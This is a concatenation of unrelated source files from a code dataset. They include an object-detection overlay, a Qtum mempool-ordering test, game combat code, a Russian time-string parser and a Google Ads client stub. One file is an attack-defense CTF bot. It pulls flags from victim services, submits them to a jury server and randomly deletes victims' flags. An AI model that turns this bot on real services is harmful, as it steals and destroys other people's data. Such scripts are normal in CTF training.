doc += svg.Text(title, x=ox, y=oy1, fill='white')
# Info
lines = [
'Objects: %d' % len(objs),
'Inference time: %.2f ms (%.2f fps)' % (inference_time * 1000, 1.0 / inference_time)
]
for i, line in enumerate(reversed(lines)):
y = oy2 - i * 1.7 * font_size
doc += svg.Rect(x=0, y=0, width=size_em(len(line)), height='1em',
transform='translate(%s, %s) scale(1,-1)' % (ox, y), _class='back')
doc += svg.Text(line, x=ox, y=y, fill='white')
return str(doc)
def convert(obj, labels):
x0, y0, x1, y1 = obj.bounding_box.flatten().tolist()
return Object(id=obj.label_id,
label=labels[obj.label_id] if labels else None,
score=obj.score,
bbox=BBox(x=x0, y=y0, w=x1 - x0, h=y1 - y0))
def print_results(inference_rate, objs):
print('\nInference (rate=%.2f fps):' % inference_rate)
for i, obj in enumerate(objs):
print(' %d: %s, area=%.2f' % (i, obj, obj.bbox.area()))
def render_gen(args):
fps_counter = utils.avg_fps_counter(30)
engines, titles = utils.make_engines(args.model, DetectionEngine)
assert utils.same_input_image_sizes(engines)
engines = itertools.cycle(engines)
engine = next(engines)
labels = utils.load_labels(args.labels) if args.labels else None
filtered_labels = set(l.strip() for l in args.filter.split(',')) if args.filter else None
get_color = make_get_color(args.color, labels)
draw_overlay = True
yield utils.input_image_size(engine)
output = None
while True:
tensor, layout, command = (yield output)
inference_rate = next(fps_counter)
if draw_overlay:
start = time.monotonic()
objs = engine .detect_with_input_tensor(tensor, threshold=args.threshold, top_k=args.top_k)
inference_time = time.monotonic() - start
objs = [convert(obj, labels) for obj in objs]
#objx,objy = [convert_xy(obj) for obj in objs]
if labels and filtered_labels:
objs = [obj for obj in objs if obj.label in filtered_labels]
objs = [obj for obj in objs if args.min_area <= obj.bbox.area() <= args.max_area]
if args.print:
print_results(inference_rate, objs)
#if objs:
# string = ""
# string_id = ""
# for i in range(len(objs)):
# socre = objs[i][2]
# if socre > 0.5:
# objid = objs[i][0]
# objx = objs[i][3][0]
# objy = objs[i][3][1]
# objw = objs[i][3][2]
# objh = objs[i][3][3]
# x = ((objx+objx+objw)/2)*1280
# y = ((objy+objy+objh)/2)*720
# if i == (len(objs)-1):
# string = string+(str(round(x,3))+","+str(round(y,3)))
# string_id = string_id+(str(objid)+" ")
# else:
# string = string+(str(round(x,3))+","+str(round(y,3))+" ")
# string_id = string_id+(str(objid)+" ")
# if string:
# now = datetime.datetime.now()
# thistime = now.strftime('%H%M%S%f')[:-3]
# print(now.strftime('%H%M%S%f')[:-3])
# print(string)
# print(string_id)
# doc = {
# 'label':string_id,
# 'positsion':string,
# 'timeid':thistime
# }
# doc_ref = db.collection("time").document(thistime)
# doc_ref.set(doc)
title = titles[engine]
output = overlay(title, objs, get_color, inference_time, inference_rate, layout)
else:
output = None
if command == 'o':
draw_overlay = not draw_overlay
elif command == 'n':
engine = next(engines)
def add_render_gen_args(parser):
parser.add_argument('--model',
help='.tflite model path', required=True)
parser.add_argument('--labels',
help='labels file path')
parser.add_argument('--top_k', type=int, default=50,
help='Max number of objects to detect')
parser.add_argument('--threshold', type=float, default=0.1,
help='Detection threshold')
parser.add_argument('--min_area', type=float, default=0.0,
help='Min bounding box area')
parser.add_argument('--max_area', type=float, default=1.0,
help='Max bounding box area')
parser.add_argument('--filter', default=None,
help='Comma-separated list of allowed labels')
parser.add_argument('--color', default=None,
help='Bounding box display color'),
parser.add_argument('--print', default=False, action='store_true',
help='Print inference results')
def main():
run_app(add_render_gen_args, render_gen)
if __name__ == '__main__':
main()
|
the-stack_0_3790 | #!/usr/bin/env python3
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
from test_framework.script import *
from test_framework.mininode import *
from test_framework.address import *
from test_framework.qtum import *
import sys
import random
import time
class QtumTransactionPrioritizationTest(BitcoinTestFramework):
def __init__(self):
super().__init__()
self.setup_clean_chain = True
self.num_nodes = 1
def setup_network(self, split=False):
self.nodes = start_nodes(self.num_nodes, self.options.tmpdir, [['-staking=1', '-rpcmaxgasprice=10000000']])
self.is_network_split = False
self.node = self.nodes[0]
def restart_node(self):
stop_nodes(self.nodes)
self.nodes = start_nodes(self.num_nodes, self.options.tmpdir, [['-staking=1', '-rpcmaxgasprice=10000000']])
self.node = self.nodes[0]
def stake_or_mine(self, old_block_count=None, use_staking=False):
# Since staking is switched on by default, if a block has been staked return that block's hash
if self.node.getblockcount() > old_block_count:
return self.node.getbestblockhash()
if use_staking:
if not old_block_count:
old_block_count = self.node.getblockcount()
while old_block_count == self.node.getblockcount():
time.sleep(0.1)
return self.node.getbestblockhash()
else:
return self.node.generate(1)[0]
def send_transaction_with_fee(self, fee):
for unspent in self.node.listunspent():
if unspent['amount'] >= 10000:
break
addr = self.node.getnewaddress()
haddr = p2pkh_to_hex_hash(addr)
tx = CTransaction()
tx.vin = [CTxIn(COutPoint(int(unspent['txid'], 16), unspent['vout']), nSequence=0)]
amount = int((float(str(unspent['amount'])) - fee)*COIN)
tx.vout = [CTxOut(amount, scriptPubKey=CScript([OP_DUP, OP_HASH160, hex_str_to_bytes(haddr), OP_EQUALVERIFY, OP_CHECKSIG]))]
tx_hex_signed = self.node.signrawtransaction(bytes_to_hex_str(tx.serialize()))['hex']
return self.node.sendrawtransaction(tx_hex_signed)
# Creates and op_call tx that calls the fallback function of the only contract that should be in existance
def send_op_call_transaction_with_gas_price(self, contract_address, gas_price, spends_txid=None, spends_vout=None):
gas_limit = 1000000
if not spends_txid:
unspent = self.node.listunspent()[0]
spends_txid = unspent['txid']
spends_vout = unspent['vout']
# Fetch the amount of the vout of the txid that we are spending
spends_tx = self.node.getrawtransaction(spends_txid, True)
for output in spends_tx['vout']:
if output['n'] == spends_vout:
break
else:
# That output does not exist...
assert(False)
addr = self.node.getnewaddress()
haddr = p2pkh_to_hex_hash(addr)
tx = CTransaction()
tx.vin = [CTxIn(COutPoint(int(spends_txid, 16), spends_vout), nSequence=0)]
tx.vout.append(CTxOut(0, scriptPubKey=CScript([b"\x04", CScriptNum(gas_limit), CScriptNum(int(gas_price*COIN)), b"\x00", hex_str_to_bytes(contract_address), OP_CALL])))
change = int((float(str(output['value'])) - gas_price*gas_limit) * COIN)
tx.vout.append(CTxOut(change, scriptPubKey=CScript([OP_DUP, OP_HASH160, hex_str_to_bytes(haddr), OP_EQUALVERIFY, OP_CHECKSIG])))
tx_hex_signed = self.node.signrawtransaction(bytes_to_hex_str(tx.serialize()))['hex']
return self.node.sendrawtransaction(tx_hex_signed)
def send_op_call_outputs_with_gas_price(self, contract_address, gas_prices, spends_txid=None, spends_vout=None):
gas_limit = 100000
if not spends_txid:
for unspent in self.node.listunspent():
if unspent['amount'] == 20000:
spends_txid = unspent['txid']
spends_vout = unspent['vout']
break
# Fetch the amount of the vout of the txid that we are spending
spends_tx = self.node.getrawtransaction(spends_txid, True)
for output in spends_tx['vout']:
if output['n'] == spends_vout:
break
else:
# That output does not exist...
assert(False)
addr = self.node.getnewaddress()
haddr = p2pkh_to_hex_hash(addr)
tx = CTransaction()
tx.vin = [CTxIn(COutPoint(int(spends_txid, 16), spends_vout), nSequence=0)]
for gas_price in gas_prices:
tx.vout.append(CTxOut(0, scriptPubKey=CScript([b"\x04", CScriptNum(gas_limit), CScriptNum(int(gas_price*COIN)), b"\x00", hex_str_to_bytes(contract_address), OP_CALL])))
change = int((float(str(output['value'])) - sum(gas_prices)*gas_limit) * COIN)
tx.vout.append(CTxOut(change, scriptPubKey=CScript([OP_DUP, OP_HASH160, hex_str_to_bytes(haddr), OP_EQUALVERIFY, OP_CHECKSIG])))
tx_hex_signed = self.node.signrawtransaction(bytes_to_hex_str(tx.serialize()))['hex']
return self.node.sendrawtransaction(tx_hex_signed)
def verify_contract_txs_are_added_last_test(self, with_restart=False, use_staking=False):
# Set the fee really high so that it should normally be added first if we only looked at the fee/size
contract_txid = self.node.createcontract("00", 4*10**6, 0.0001)['txid']
normal_txid = self.node.sendtoaddress(self.node.getnewaddress(), 1)
old_block_count = self.node.getblockcount()
if with_restart:
self.restart_node()
block_hash = self.stake_or_mine(old_block_count=old_block_count, use_staking=use_staking)
block_txs = self.node.getblock(block_hash)['tx']
if use_staking:
block_txs.pop(1) # Ignore the coinstake tx so we can reuse the tests for both pow and pos
assert_equal(len(block_txs), 3)
assert_equal(block_txs.index(normal_txid), 1)
assert_equal(block_txs.index(contract_txid), 2)
# Verifies that contract transactions are correctly ordered by descending (minimum among outputs) gas price and ascending size
# Sends 7 txs in total
def verify_contract_txs_internal_order_test(self, with_restart=False, use_staking=False):
contract_address = list(self.node.listcontracts().keys())[0]
sender = self.node.getnewaddress()
tx4 = self.send_op_call_outputs_with_gas_price(contract_address, [0.0001])
tx5 = self.send_op_call_outputs_with_gas_price(contract_address, [0.0001, 0.0001])
tx3 = self.send_op_call_outputs_with_gas_price(contract_address, [0.00010001])
tx6 = self.send_op_call_outputs_with_gas_price(contract_address, [0.0001, 0.00010001, 0.00010001])
tx2 = self.send_op_call_outputs_with_gas_price(contract_address, [0.002])
tx1 = self.node.sendtoaddress(sender, 1)
tx7 = self.node.sendtocontract(contract_address, "00", 0, 100000, "0.000001", sender)['txid']
old_block_count = self.node.getblockcount()
if with_restart:
self.restart_node()
# Ordering based on gas_price should now be
block_hash = self.stake_or_mine(old_block_count=old_block_count, use_staking=use_staking)
block = self.node.getblock(block_hash)
block_txs = block['tx']
if use_staking:
block_txs.pop(1) # Ignore the coinstake tx so we can reuse the tests for both pow and pos
assert_equal(block_txs[1:], [tx1, tx2, tx3, tx4, tx5, tx6, tx7])
# In the case of an ancestor chain in the mempool such that a contract tx spends another normal tx that is in the mempool
# the contract tx should still be added last while the tx it spends should be added based on it's fee ordering.
# In this test we create 4 txs.
# 1. a normal tx has a fee > tx2 and tx3
# 2. a ancestor normal tx that will be spent by the contract tx has a fee < tx1 and tx3 >
# 3. a normal tx with a fee < tx2 and tx3
# 4. a op call contract tx spending tx2.
# Expected transaction ordering in the block should thus be tx1, tx2, tx3, tx4
def verify_ancestor_chain_with_contract_txs_test(self, with_restart=False, use_staking=False):
contract_address = list(self.node.listcontracts().keys())[0]
tx1 = self.send_transaction_with_fee(0.01)
tx2 = self.send_transaction_with_fee(0.005)
tx3 = self.send_transaction_with_fee(0.001)
# Create a contract tx (4) that spends tx3
tx4 = self.send_op_call_transaction_with_gas_price(contract_address, 0.001, spends_txid=tx2, spends_vout=0)
# Make sure that all txs are in the mempool
assert_equal(len(self.node.getrawmempool()), 4)
old_block_count = self.node.getblockcount()
if with_restart:
self.restart_node()
block_hash = self.stake_or_mine(old_block_count=old_block_count, use_staking=use_staking)
block_txs = self.node.getblock(block_hash)['tx']
if use_staking:
block_txs.pop(1) # Ignore the coinstake tx so we can reuse the tests for both pow and pos
assert_equal(len(block_txs), 5)
assert_equal(block_txs[1], tx1)
assert_equal(block_txs[2], tx2)
assert_equal(block_txs[3], tx3)
assert_equal(block_txs[4], tx4)
# Creates two different contract tx chains.
def verify_contract_ancestor_txs_test(self, with_restart=False, use_staking=False):
contract_address = list(self.node.listcontracts().keys())[0]
for unspent in self.node.listunspent():
if unspent['amount'] > 10000:
break
address = self.node.getnewaddress()
expected_tx_order = []
for (expected_tx_index, gas_price) in [(1, 60), (2, 50), (7, 40), (8, 50)]:
tx = CTransaction()
tx.vin = [CTxIn(COutPoint(int(unspent['txid'], 16), unspent['vout']), nSequence=0)]
tx.vout = [
CTxOut(0, scriptPubKey=CScript([b"\x04", CScriptNum(30000), CScriptNum(gas_price), b"\x00", hex_str_to_bytes(contract_address), OP_CALL])),
CTxOut(int((unspent['amount'] - Decimal('0.1'))*COIN), scriptPubKey=CScript([OP_DUP, OP_HASH160, hex_str_to_bytes(p2pkh_to_hex_hash(address)), OP_EQUALVERIFY, OP_CHECKSIG]))
]
tx_raw = self.node.signrawtransaction(bytes_to_hex_str(tx.serialize()))['hex']
# Make the next vin refer to this tx.
unspent['amount'] -= Decimal('0.1')
unspent['txid'] = self.node.sendrawtransaction(tx_raw)
unspent['vout'] = 1
expected_tx_order.append((expected_tx_index, unspent['txid']))
for unspent in self.node.listunspent():
if unspent['amount'] == 20000 and unspent['address'] != address:
break
# The list of tuples specifies (expected position in block txs, gas_price)
for (expected_tx_index, gas_price) in [(3, 49), (4, 48), (5, 47), (6, 46)]:
tx = CTransaction()
tx.vin = [CTxIn(COutPoint(int(unspent['txid'], 16), unspent['vout']), nSequence=0)]
tx.vout = [
CTxOut(0, scriptPubKey=CScript([b"\x04", CScriptNum(30000), CScriptNum(gas_price), b"\x00", hex_str_to_bytes(contract_address), OP_CALL])),
CTxOut(int((unspent['amount'] - Decimal('0.1'))*COIN), scriptPubKey=CScript([OP_DUP, OP_HASH160, hex_str_to_bytes(p2pkh_to_hex_hash(address)), OP_EQUALVERIFY, OP_CHECKSIG]))
]
tx_raw = self.node.signrawtransaction(bytes_to_hex_str(tx.serialize()))['hex']
# Make the next vin refer to this tx.
unspent['amount'] -= Decimal('0.1')
unspent['txid'] = self.node.sendrawtransaction(tx_raw)
unspent['vout'] = 1
expected_tx_order.append((expected_tx_index, unspent['txid']))
old_block_count = self.node.getblockcount()
if with_restart:
self.restart_node()
block_hash = self.stake_or_mine(old_block_count=old_block_count, use_staking=use_staking)
block_txs = self.node.getblock(block_hash)['tx']
if use_staking:
block_txs.pop(1) # Ignore the coinstake tx so we can reuse the tests for both pow and pos
# Even though the gas prices differ, since they the ancestor txs must be included before the child txs we expect the order by which they were sent,
# always chosing the tx with the highest gas price whose ancestors have already been included.
for (expected_tx_index, txid) in expected_tx_order:
assert_equal(block_txs[expected_tx_index], txid)
def run_test(self):
self.node.generate(500+COINBASE_MATURITY)
print("running pow tests")
self.verify_contract_txs_are_added_last_test()
self.verify_ancestor_chain_with_contract_txs_test()
self.verify_contract_txs_internal_order_test()
self.verify_contract_ancestor_txs_test()
# Verify that the mempool is empty before running more tests
assert_equal(self.node.getrawmempool(), [])
# Redo the testing and check that the mempool is correctly ordered after a restart
print("running pow tests with restart")
self.verify_contract_txs_are_added_last_test(with_restart=True)
self.verify_ancestor_chain_with_contract_txs_test(with_restart=True)
self.verify_contract_txs_internal_order_test(with_restart=True)
self.verify_contract_ancestor_txs_test(with_restart=True)
# Verify that the mempool is empty before running more tests
assert_equal(self.node.getrawmempool(), [])
print("running pos tests")
self.verify_contract_txs_are_added_last_test(use_staking=True)
self.verify_ancestor_chain_with_contract_txs_test(use_staking=True)
self.verify_contract_txs_internal_order_test(use_staking=True)
self.verify_contract_ancestor_txs_test(use_staking=True)
# Verify that the mempool is empty before running more tests
assert_equal(self.node.getrawmempool(), [])
print("running pos tests with restart")
self.verify_contract_txs_are_added_last_test(with_restart=True, use_staking=True)
self.verify_ancestor_chain_with_contract_txs_test(with_restart=True, use_staking=True)
self.verify_contract_txs_internal_order_test(with_restart=True, use_staking=True)
self.verify_contract_ancestor_txs_test(with_restart=True, use_staking=True)
if __name__ == '__main__':
QtumTransactionPrioritizationTest().main()
|
the-stack_0_3791 | from app.engine.combat.solver import CombatPhaseSolver
from app.engine import skill_system, item_system
from app.engine.game_state import game
from app.engine.combat.simple_combat import SimpleCombat
from app.engine.objects.unit import UnitObject
from app.engine.objects.item import ItemObject
class BaseCombat(SimpleCombat):
alerts: bool = True
"""
Handles in base and in prep screen "use" of items
"""
def __init__(self, attacker: UnitObject, main_item: ItemObject,
main_target: UnitObject, script):
self.attacker = attacker
self.defender = main_target
self.main_item = main_item
self.def_item = None
if self.defender:
self.def_item = self.defender.get_weapon()
self.state_machine = CombatPhaseSolver(
self.attacker, self.main_item, [self.main_item],
[self.defender], [[]], [self.defender.position],
self.defender, self.def_item, script)
self.full_playback = []
self.playback = []
self.actions = []
self.start_combat()
while self.state_machine.get_state():
self.actions, self.playback = self.state_machine.do()
self.full_playback += self.playback
self._apply_actions()
self.state_machine.setup_next_state()
def start_combat(self):
game.events.trigger('combat_start', self.attacker, self.defender, self.main_item, self.attacker.position)
skill_system.pre_combat(self.full_playback, self.attacker, self.main_item, self.defender, 'attack')
if self.attacker is not self.defender:
skill_system.pre_combat(self.full_playback, self.defender, self.def_item, self.attacker, 'defense')
skill_system.start_combat(self.full_playback, self.attacker, self.main_item, self.defender, 'attack')
item_system.start_combat(self.full_playback, self.attacker, self.main_item, self.defender, 'attack')
if self.attacker is not self.defender:
skill_system.start_combat(self.full_playback, self.defender, self.def_item, self.attacker, 'defense')
if self.def_item:
item_system.start_combat(self.full_playback, self.defender, self.def_item, self.attacker, 'defense')
def cleanup_combat(self):
skill_system.cleanup_combat(self.full_playback, self.attacker, self.main_item, self.defender, 'attack')
if self.attacker is not self.defender:
skill_system.cleanup_combat(self.full_playback, self.defender, self.def_item, self.attacker, 'defense')
def end_combat(self):
skill_system.end_combat(self.full_playback, self.attacker, self.main_item, self.defender, 'attack')
item_system.end_combat(self.full_playback, self.attacker, self.main_item, self.defender, 'attack')
if self.attacker is not self.defender:
skill_system.end_combat(self.full_playback, self.defender, self.def_item, self.attacker, 'defense')
if self.def_item:
item_system.end_combat(self.full_playback, self.defender, self.def_item, self.attacker, 'defense')
skill_system.post_combat(self.full_playback, self.attacker, self.main_item, self.defender, 'attack')
if self.attacker is not self.defender:
skill_system.post_combat(self.full_playback, self.defender, self.def_item, self.attacker, 'defense')
def _all_units(self) -> list:
"""
Returns list of all units taking in this combat
"""
all_units = [self.attacker]
if self.attacker is not self.defender:
all_units.append(self.defender)
return all_units
def handle_state_stack(self):
pass
|
the-stack_0_3792 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
def check(S,a,b):
if (a in S) and (b not in S):
return 0
if (b in S) and (a not in S):
return 0
return 1
def main():
S = str(input())
flag = 1
for a,b in [['N','S'],['E','W']]:
flag = min(check(S,a,b),flag)
if flag==1:
print('Yes')
else:
print('No')
if __name__ == '__main__':
main() |
the-stack_0_3794 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests
import socket
import time
import sys
import random
import traceback
def send_flag(your_teamnum, jury_hostport, flag):
global requests
url = 'http://' + jury_hostport + '/flag?teamid=' + str(your_teamnum) + '&flag=' + flag
try:
r = requests.get(url)
print("Try send flag " + flag)
if r.status_code != 200:
print("FAIL")
print(r.text)
else:
print("OK!!!!")
except Exception as ex:
print("Could not connect to jury " + url + str(ex))
except SystemExit:
pass
def delete_flag(ip_address, port, flag_id):
try:
# print("try connect " + host + ":" + str(port))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(1)
s.connect((ip_address, port))
s.recv(1024)
s.send("delete\n".encode("utf-8"))
s.recv(1024)
s.send((flag_id + "\n").encode("utf-8"))
s.recv(1024)
s.close()
except socket.timeout:
print("Error(1) in delete_flag socket.timeout")
traceback.print_exc()
exit(509)
except socket.error as serr:
print("Error(2) in delete_flag " + str(serr))
traceback.print_exc()
exit(508)
except Exception as e:
print("Error(3) in delete_flag " + str(e))
traceback.print_exc()
exit(507)
return ''
def get_flag(ip_address, port, flag_id):
try:
# print("try connect " + host + ":" + str(port))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(1)
s.connect((ip_address, port))
s.recv(1024)
s.send("get\n".encode("utf-8"))
s.recv(1024)
s.send((flag_id + "\n").encode("utf-8"))
result = s.recv(1024)
result = result.decode("utf-8", "ignore")
flag2 = result.strip()
flag2 = flag2.split("FOUND FLAG: ")
if len(flag2) == 2:
flag2 = flag2[1]
else:
flag2 = ''
s.close()
return flag2
except socket.timeout:
print("Error(1) in get_flag socket.timeout")
traceback.print_exc()
exit(500)
except socket.error as serr:
print("Error(2) in get_flag " + str(serr))
traceback.print_exc()
exit(501)
except Exception as e:
print("Error(3) in get_flag " + str(e))
traceback.print_exc()
exit(502)
return ''
def start_attack(your_teamnum, jury_hostport, ip_address, port):
print("Start attack to (" + ip_address + ":" + str(port) + ")")
flag_ids = []
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(1)
s.connect((ip_address, port))
s.recv(1024)
s.send("list\n".encode("utf-8"))
result = ""
result1 = s.recv(1024)
result1 = result1.decode("utf-8", "ignore")
while result1.strip() != "":
result1 = s.recv(1024)
result1 = result1.decode("utf-8", "ignore")
if result1.strip() == "":
break
result = result + result1
s.close()
result = result.split('\n')
for i in result:
flag_id = i.split(":")
if len(flag_id) > 1:
flag_id = flag_id[1].strip()
flag_ids.append(flag_id)
except socket.timeout:
print("Socket timeout")
traceback.print_exc()
exit(504)
except socket.error as serr:
print("Error in start_attack: " + str(serr))
traceback.print_exc()
exit(505)
except Exception as e:
print("Error in start_attack: " + str(e))
traceback.print_exc()
exit(506)
for flag_id in flag_ids:
flag = get_flag(ip_address, port, flag_id)
print(flag_id + ": " + flag)
if flag != '':
send_flag(your_teamnum, jury_hostport, flag)
# random remove flag
n = random.randint(1,100)
if n < 50:
delete_flag(ip_address, port, flag_id)
# flag = str(uuid.uuid4())
# send_flag(your_teamnum, jury_host, jury_port, flag)
jury_hostport = sys.argv[1]
your_teamnum = sys.argv[2]
attack_hosts = sys.argv[3]
attack_hosts = attack_hosts.split(",")
print(attack_hosts)
while(True):
print(" =============== ")
for hostport in attack_hosts:
victum_host = hostport.split(":")[0]
victum_port = int(hostport.split(":")[1])
start_attack(your_teamnum, jury_hostport, victum_host, victum_port)
print(hostport)
t = random.randint(1,60)
print("wait " + str(t) + " sec")
time.sleep(t) # wait t seconds before attack |
the-stack_0_3803 | import warnings
from datetime import timedelta
from string import digits
from typing import Union
CHAR_TO_RU_STR = {'y': ('лет', 'год', 'года'),
'M': ('Месяцев', 'Месяц', 'Месяца'),
'w': ('недель', 'неделя', 'недели'),
'd': ('дней', 'день', 'дня'),
'h': ('часов', 'час', 'часа'),
'm': ('минут', 'минута', 'минуты'),
's': ('секунд', 'секунда', 'секунды')}
CHAR_TO_SEC = {'y': 31536000, 'M': 2592000, 'w': 604800, 'd': 86400, 'h': 3600, 'm': 60, 's': 1,
'г': 31536000, 'л': 31536000, 'М': 2592000, 'н': 604800, 'д': 86400, 'ч': 3600, 'м': 60, 'с': 1}
CHAR_TO_SEC_KEYS = set(CHAR_TO_SEC.keys()) # speeds up parsing when checking keys
STR_TO_SEC = {'years': 31536000, 'months': 2592000, 'weeks': 604800,
'days': 86400, 'hours': 3600, 'minutes': 60, 'seconds': 1}
def _get_times(digit: Union[int, float], tm: str) -> Union[str, None]:
digit = round(digit)
if digit == 0:
return None
tmp = digit % 100
if 11 <= tmp <= 19:
return f"{digit} {CHAR_TO_RU_STR[tm][0]}"
tmp = digit % 10
if tmp == 1:
return f"{digit} {CHAR_TO_RU_STR[tm][1]}"
if 2 <= tmp <= 4:
return f"{digit} {CHAR_TO_RU_STR[tm][2]}"
if tmp == 0 or 5 <= tmp <= 9:
return f"{digit} {CHAR_TO_RU_STR[tm][0]}"
return f"{digit} {CHAR_TO_RU_STR[tm][2]}"
def human_parser(s: str) -> int:
tmp_digit: str = ''
seconds: int = 0
for char in s:
if char in digits:
tmp_digit += char
elif tmp_digit and char in CHAR_TO_SEC_KEYS:
seconds += int(tmp_digit) * CHAR_TO_SEC[char]
tmp_digit = ''
return seconds
class Sec2Hum:
__slots__ = ['years', 'months', 'weeks', 'days', 'hours', 'minutes', 'seconds', 'string']
def __init__(self, seconds: Union[int, float, timedelta]):
if isinstance(seconds, int) or isinstance(seconds, float):
seconds = abs(seconds)
elif isinstance(seconds, timedelta):
seconds = seconds.total_seconds()
else:
raise TypeError
if seconds == 0:
self.seconds = 0
self.string = '0 секунд'
else:
for k, v in STR_TO_SEC.items():
self.__setattr__(k, seconds // v)
seconds %= v
self.string = " ".join(filter(None, (_get_times(self.years, 'y'),
_get_times(self.months, 'M'),
_get_times(self.weeks, 'w'),
_get_times(self.days, 'd'),
_get_times(self.hours, 'h'),
_get_times(self.minutes, 'm'),
_get_times(self.seconds, 's'))))
def __str__(self) -> str:
return self.string
def __repr__(self) -> str:
return f"{self.__class__} {self.string}"
class Hum2Sec:
"""
:var self.seconds:
:type self.seconds: int
"""
__seconds: int
__timedelta: timedelta
def __init__(self, string: str):
"""
:param string: time-string to parse.
:type string: str.
"""
self.string = string
self.calculate()
def calculate(self):
if self.string.isdigit():
self.__seconds = int(self.string)
try:
self.__timedelta = timedelta(seconds=self.__seconds)
except OverflowError:
self.__timedelta = timedelta(seconds=999999999)
else:
self.__seconds = human_parser(self.string)
try:
self.__timedelta = timedelta(seconds=self.__seconds)
except OverflowError:
self.__timedelta = timedelta(seconds=999999999)
@property
def seconds(self):
return self.__seconds
@seconds.setter
def seconds(self, value):
raise ValueError
@property
def time_dlt(self):
return self.__timedelta
@time_dlt.setter
def time_dlt(self, value):
raise ValueError
@property
def delta(self):
"""
Deprecated, use time_dlt instead.
:return:
"""
warnings.warn("Hum2Sec.delta deprecated, use Hum2Sec.time_dlt instead.", DeprecationWarning, stacklevel=2)
return self.__timedelta
@delta.setter
def delta(self, value):
raise ValueError
def __str__(self) -> str:
return str(self.__seconds)
def __repr__(self) -> str:
return f"{self.__class__} {self.__seconds}"
|
the-stack_0_3804 | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from collections import OrderedDict
import os
import re
from typing import Dict, Optional, Sequence, Tuple, Type, Union
from google.api_core import client_options as client_options_lib
from google.api_core import gapic_v1
from google.api_core import retry as retries
from google.auth import credentials as ga_credentials # type: ignore
from google.auth.transport import mtls # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
from google.auth.exceptions import MutualTLSChannelError # type: ignore
from google.oauth2 import service_account # type: ignore
try:
OptionalRetry = Union[retries.Retry, gapic_v1.method._MethodDefault]
except AttributeError: # pragma: NO COVER
OptionalRetry = Union[retries.Retry, object] # type: ignore
from google.ads.googleads.v9.resources.types import user_interest
from google.ads.googleads.v9.services.types import user_interest_service
from .transports.base import UserInterestServiceTransport, DEFAULT_CLIENT_INFO
from .transports.grpc import UserInterestServiceGrpcTransport
class UserInterestServiceClientMeta(type):
"""Metaclass for the UserInterestService client.
This provides class-level methods for building and retrieving
support objects (e.g. transport) without polluting the client instance
objects.
"""
_transport_registry = (
OrderedDict()
) # type: Dict[str, Type[UserInterestServiceTransport]]
_transport_registry["grpc"] = UserInterestServiceGrpcTransport
def get_transport_class(
cls, label: str = None,
) -> Type[UserInterestServiceTransport]:
"""Return an appropriate transport class.
Args:
label: The name of the desired transport. If none is
provided, then the first transport in the registry is used.
Returns:
The transport class to use.
"""
# If a specific transport is requested, return that one.
if label:
return cls._transport_registry[label]
# No transport is requested; return the default (that is, the first one
# in the dictionary).
return next(iter(cls._transport_registry.values()))
class UserInterestServiceClient(metaclass=UserInterestServiceClientMeta):
"""Service to fetch Google Ads User Interest."""
@staticmethod
def _get_default_mtls_endpoint(api_endpoint):
"""Convert api endpoint to mTLS endpoint.
Convert "*.sandbox.googleapis.com" and "*.googleapis.com" to
"*.mtls.sandbox.googleapis.com" and "*.mtls.googleapis.com" respectively.
Args:
api_endpoint (Optional[str]): the api endpoint to convert.
Returns:
str: converted mTLS api endpoint.
"""
if not api_endpoint:
return api_endpoint
mtls_endpoint_re = re.compile(
r"(?P<name>[^.]+)(?P<mtls>\.mtls)?(?P<sandbox>\.sandbox)?(?P<googledomain>\.googleapis\.com)?"
)
m = mtls_endpoint_re.match(api_endpoint)
name, mtls, sandbox, googledomain = m.groups()
if mtls or not googledomain:
return api_endpoint
if sandbox:
return api_endpoint.replace(
"sandbox.googleapis.com", "mtls.sandbox.googleapis.com"
)
return api_endpoint.replace(".googleapis.com", ".mtls.googleapis.com")
DEFAULT_ENDPOINT = "googleads.googleapis.com"
DEFAULT_MTLS_ENDPOINT = _get_default_mtls_endpoint.__func__( # type: ignore
DEFAULT_ENDPOINT
)
@classmethod
def from_service_account_info(cls, info: dict, *args, **kwargs):
"""Creates an instance of this client using the provided credentials info.
Args:
info (dict): The service account private key info.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
UserInterestServiceClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_info(
info
)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
@classmethod
def from_service_account_file(cls, filename: str, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
file.
Args:
filename (str): The path to the service account private key json
file.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
UserInterestServiceClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_file(
filename
)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
from_service_account_json = from_service_account_file
@property
def transport(self) -> UserInterestServiceTransport:
"""Return the transport used by the client instance.
Returns:
UserInterestServiceTransport: The transport used by the client instance.
"""
return self._transport
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
"""Releases underlying transport's resources.
.. warning::
ONLY use as a context manager if the transport is NOT shared
with other clients! Exiting the with block will CLOSE the transport
and may cause errors in other clients!
"""
self.transport.close()
@staticmethod
def user_interest_path(customer_id: str, user_interest_id: str,) -> str:
"""Return a fully-qualified user_interest string."""
return "customers/{customer_id}/userInterests/{user_interest_id}".format(
customer_id=customer_id, user_interest_id=user_interest_id,
)
@staticmethod
def parse_user_interest_path(path: str) -> Dict[str, str]:
"""Parse a user_interest path into its component segments."""
m = re.match(
r"^customers/(?P<customer_id>.+?)/userInterests/(?P<user_interest_id>.+?)$",
path,
)
return m.groupdict() if m else {}
@staticmethod
def common_billing_account_path(billing_account: str,) -> str:
